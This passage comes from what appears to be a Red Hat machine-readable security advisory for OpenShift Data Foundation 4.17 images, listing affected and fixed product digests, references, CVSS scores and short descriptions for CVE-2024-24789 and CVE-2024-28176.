"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-24789"
},
{
"category": "external",
"summary": "RHBZ#2292668",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2292668"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-24789",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24789"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-24789",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24789"
}
],
"release_date": "2024-06-04T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-30T14:25:22+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8676"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: archive/zip: Incorrect handling of certain ZIP files"
},
{
"cve": "CVE-2024-28176",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2024-03-10T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2268820"
}
],
"notes": [
{
"category": "description",
"text": "Jose was found to have an uncontrolled resource consumption vulnerability. Under certain conditions, the user\u0027s environment can consume an unreasonable amount of CPU time or memory during JWE decryption operations, leading to a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jose: resource exhaustion",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64"
],
"known_not_affected": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
